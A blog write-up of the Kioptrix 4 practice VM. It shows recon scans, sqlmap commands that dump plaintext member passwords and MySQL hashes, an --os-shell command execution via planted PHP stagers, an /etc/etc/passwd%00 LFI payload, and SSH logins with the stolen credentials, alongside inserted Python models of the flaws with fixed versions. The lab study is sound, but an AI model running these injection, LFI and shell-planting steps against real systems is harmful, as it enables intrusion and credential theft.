Wednesday, 20 November 2013

Kioptrix 4

root@kali:~# netdiscover

 Currently scanning: 192.168.88.0/16   |   Screen View: Unique Hosts                                                              

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180

 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.100  08:00:27:23:30:51    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.103  08:00:27:e0:cd:64    01    060   CADMUS COMPUTER SYSTEMS
          
root@kali:~# unicornscan 192.168.56.103
TCP open                http[   80]        from 192.168.56.103  ttl 64

root@kali:~# nikto -host 192.168.56.103
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.103
+ Target Hostname:    192.168.56.103
+ Target Port:        80
+ Start Time:         2013-11-19 14:22:55 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 6544 items checked: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2013-11-19 14:23:06 (GMT1) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb http://192.168.56.103/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------
START_TIME: Tue Nov 19 14:23:42 2013
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.56.103/ ----
+ http://192.168.56.103/cgi-bin/ (CODE:403|SIZE:329)
==> DIRECTORY: http://192.168.56.103/images/
+ http://192.168.56.103/index (CODE:200|SIZE:1255)
+ http://192.168.56.103/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.56.103/john/
+ http://192.168.56.103/logout (CODE:302|SIZE:0)
+ http://192.168.56.103/member (CODE:302|SIZE:220)
+ http://192.168.56.103/server-status (CODE:403|SIZE:334)

---- Entering directory: http://192.168.56.103/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.103/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
-----------------
DOWNLOADED: 4592 - FOUND: 6

Mantra (HackBar) on http://192.168.56.103/, submitting the Login form with a stray quote in the password field:

Load URL
http://192.168.56.103/checklogin.php

Enable Post data
myusername=admin&mypassword='pass&Submit=Login

Execute

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28

The unbalanced quote breaks the SQL statement, so mysql_query() returns FALSE and mysql_num_rows() complains about it: the password field is concatenated into the query unescaped. sqlmap confirms the injection and enumerates the databases:

root@kali:~# sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" --dbs

available databases [3]:
[*] information_schema
[*] members
[*] mysql

...

sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" -D members -T members -C id,password,username --dump

+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
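The mysql_num_rows() warning and the sqlmap dump above both follow from one line in checklogin.php that the page does not show. The following is an added example written for this post, not code taken from the Kioptrix image: it models the assumed textbook shape of that query (user input concatenated straight into the SQL string) over an in-memory SQLite table constructed from the dumped members rows, reproduces the quote-induced failure and the classic `' OR '1'='1` bypass, and puts a parameterised query beside it. The query text and the table are assumptions, SQLite stands in for MySQL.

```python
"""Added example: why a single quote in mypassword produced the
mysql_num_rows() warning, and what the same flaw allows.

checklogin.php is not shown on the page; the query in vulnerable_login()
is the ASSUMED textbook shape that such a warning implies. SQLite stands
in for MySQL, and the table content is constructed from the dump above."""
import sqlite3

# Constructed sample rows mirroring the dumped `members` table.
SAMPLE_ROWS = [
    (1, "john", "MyNameIsJohn"),
    (2, "robert", "ADGAdsafdfwt4gadfga=="),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_login(conn, username, password):
    """String-concatenated query (assumed shape of checklogin.php).

    Returns 'error' when the SQL no longer parses (the PHP equivalent:
    mysql_query() returns FALSE and mysql_num_rows(FALSE) emits the warning
    seen above), 'ok' when at least one row matches, otherwise 'denied'."""
    sql = (f"SELECT * FROM members WHERE username='{username}' "
           f"AND password='{password}'")
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return "error"
    return "ok" if rows else "denied"


def safe_login(conn, username, password):
    """Parameterised query: the values are bound, never parsed as SQL."""
    rows = conn.execute(
        "SELECT * FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return "ok" if rows else "denied"


def demo():
    """Run the probe from the post and a bypass against both versions."""
    conn = make_db()
    return {
        "quote_probe": vulnerable_login(conn, "admin", "'pass"),       # error
        "bypass": vulnerable_login(conn, "admin", "' OR '1'='1"),      # ok
        "safe_probe": safe_login(conn, "admin", "'pass"),              # denied
        "safe_bypass": safe_login(conn, "admin", "' OR '1'='1"),       # denied
        "valid": safe_login(conn, "john", "MyNameIsJohn"),             # ok
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The "error" result is exactly the symptom observed with Mantra: a failed query, not a failed login. Binding parameters closes the injection, but note that the dump shows the password column stored in clear, so the fix on the target would also have to hash the stored passwords.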


The dumped usernames match the listable /john/ directory that dirb found, and a /robert/ directory exists alongside it, each holding a <name>.php page:

http://192.168.56.103/john/
http://192.168.56.103/robert/
http://192.168.56.103/john/john.php
http://192.168.56.103/robert/robert.php

sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" -D mysql -T user -C Host,User,Password --dump

+-----------+------------------+-------------------------------------------+
| Host      | User             | Password                                  |
+-----------+------------------+-------------------------------------------+
| 127.0.0.1 | root             |                                           |
| Kioptrix4 |                  |                                           |
| Kioptrix4 | root             |                                           |
| localhost |                  |                                           |
| localhost | debian-sys-maint | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
| localhost | root             | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
+-----------+------------------+-------------------------------------------+

Note the empty Password cells: root can connect from 127.0.0.1 and from Kioptrix4 without a password, and only the two localhost accounts carry a hash (the same one for root and debian-sys-maint).

Appending --os-shell to the same sqlmap command turns the injection into a command shell: sqlmap writes a small PHP file stager and backdoor into the web root through the injection (the tmp*.php files that show up in the /var/www listing below) and relays commands to it over HTTP.

--os-shell

os-shell> cat /etc/passwd
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
---

os-shell> cat /etc/group
...
admin:x:115:loneferret
...

os-shell> ls /var/www
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
checklogin.php
database.sql
images
index.php
john
login_success.php
logout.php
member.php
robert
tmpbjbbq.php
tmpbtahr.php
tmpueovq.php
tmpuxztg.php

os-shell> cat /var/www/login_success.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
session_start();
if(!session_is_registered(myusername)){
    header("location:index.php");
}else{
    $id=$_GET['username'];
     header("location:member.php?username=$id");
}
?>

os-shell> cat /var/www/member.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
session_start();
if(!session_is_registered(myusername)){
        header("location:index.php");
}

$page = $_GET['username'];

//$page = preg_replace('/etc/','',$page,1) . ".php";
$page = preg_replace('/etc/','',$page,1);

if(file_exists($page)){
    $memPage = $page . "/" . $page . ".php";
    include($memPage);
}else{
    print ("User " .$page.'<br><br>');
    print("Oups, something went wrong with your member's page account.<br>Please contact your local Administrator<br> to fix the issue.");
    print ('<br>');
    print('<form method="link" action="index.php"><input type=submit value="Back"></form>');
}
?>
---
...
http://192.168.56.103/member.php?username=/etc/etc/passwd%00

This is an LFI. preg_replace() removes only the first "etc" (the limit argument is 1), so /etc/etc/passwd becomes //etc/passwd, which file_exists() accepts. The %00 is decoded to a NUL byte, and the PHP 5.2.4 on this host stops reading the path at that NUL, so the "/" . $page . ".php" suffix that member.php appends is never seen and /etc/passwd itself gets included.
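The member.php logic above is small enough to trace by hand, but the interaction between the single-shot preg_replace() and the NUL byte is easy to get wrong. Here is an added example, my code rather than anything from the Kioptrix image: a Python model of that path handling that returns what file_exists() tests and what include() opens for a given username parameter, beside a hardened replacement. The one assumption is that the target's PHP 5.2.4 truncates paths at a NUL byte, as every PHP release before 5.3.4 did; the /var/www document root is taken from the directory listing above.

```python
"""Added example: model of member.php's path handling (not the image's
code) and a hardened version. Assumes NUL-byte truncation, which PHP
5.2.4 on the target exhibits (fixed upstream in 5.3.4)."""
import re
from urllib.parse import unquote


def nul_truncate(path: str) -> str:
    """Emulate C-string semantics: everything after the first NUL is invisible."""
    return path.split("\x00", 1)[0]


def php_member_page(raw_username: str) -> tuple:
    """Mirror member.php for the still-encoded GET value.

    Returns (path that file_exists() tests, path that include() opens)."""
    username = unquote(raw_username)                      # PHP decodes %00 to "\x00"
    page = re.sub("etc", "", username, count=1)           # preg_replace('/etc/', '', $page, 1)
    checked = nul_truncate(page)                          # file_exists($page)
    included = nul_truncate(page + "/" + page + ".php")   # include($page."/".$page.".php")
    return checked, included


# Hardened version: allow-list the account name, build the path from a fixed base.
SAFE_NAME = re.compile(r"[a-z][a-z0-9_]{0,31}")
DOCROOT = "/var/www"   # assumed, from the /var/www listing on the page


def hardened_member_page(raw_username: str):
    """Return the include path for a plain account name, or None.

    A NUL byte, a slash, a dot or a leading '/' all fail the pattern, so there
    is nothing to strip and nothing left for truncation to hide."""
    username = unquote(raw_username)
    if not SAFE_NAME.fullmatch(username):
        return None
    return f"{DOCROOT}/{username}/{username}.php"


if __name__ == "__main__":
    for u in ("john", "/etc/passwd%00", "/etc/etc/passwd", "/etc/etc/passwd%00"):
        print(f"{u:20} vulnerable -> {php_member_page(u)}")
        print(f"{'':20} hardened   -> {hardened_member_page(u)}")
```

Running it shows why each piece of the request is needed: a single /etc/passwd%00 loses its "etc" and becomes //passwd, which does not exist; /etc/etc/passwd without the NUL passes file_exists() but include() then looks for //etc/passwd///etc/passwd.php; only /etc/etc/passwd%00 makes both checks land on /etc/passwd. The hardened function should additionally confirm that the name exists in the members table before including anything.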

os-shell> netstat -nap | grep tcp
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      4375/sh        
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -              
tcp        0      0 192.168.56.103:80       192.168.56.101:43597    ESTABLISHED 4375/sh        
---

root@kali:/var/www/phpshells# nmap -sS 192.168.56.103

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-19 15:26 CET
Nmap scan report for 192.168.56.103
Host is up (0.00025s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:E0:CD:64 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 15.42 seconds

root@kali:/var/www/phpshells# ssh john@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (RSA) to the list of known hosts.
john@192.168.56.103's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ pwd
*** unknown command: pwd
john:~$ ls
john:~$ id
*** unknown command: id
john:~$ ls
john:~$ ls /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.


os-shell> ls -al /home/john
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
total 28
drwxr-xr-x 2 john john 4096 Feb  4  2012 .
drwxr-xr-x 5 root root 4096 Feb  4  2012 ..
-rw------- 1 john john   61 Feb  4  2012 .bash_history
-rw-r--r-- 1 john john  220 Feb  4  2012 .bash_logout
-rw-r--r-- 1 john john 2940 Feb  4  2012 .bashrc
-rw-r--r-- 1 john john  118 Feb  4  2012 .lhistory
-rw-r--r-- 1 john john  586 Feb  4  2012 .profile

os-shell> cat /home/john/.profile
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
    . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

john:~$
john:~$ echo $PATH
*** forbidden path -> "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games"
*** Kicked out
Connection to 192.168.56.103 closed.

root@kali:/var/www/phpshells# ssh robert@192.168.56.103
robert@192.168.56.103's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls


robert:~$ lpath
Allowed:
 /home/robert


That's all. I have not found the solution. My current goal was to identify the vulnerabilities. Currently my knowledge is not enough for privilege escalation.
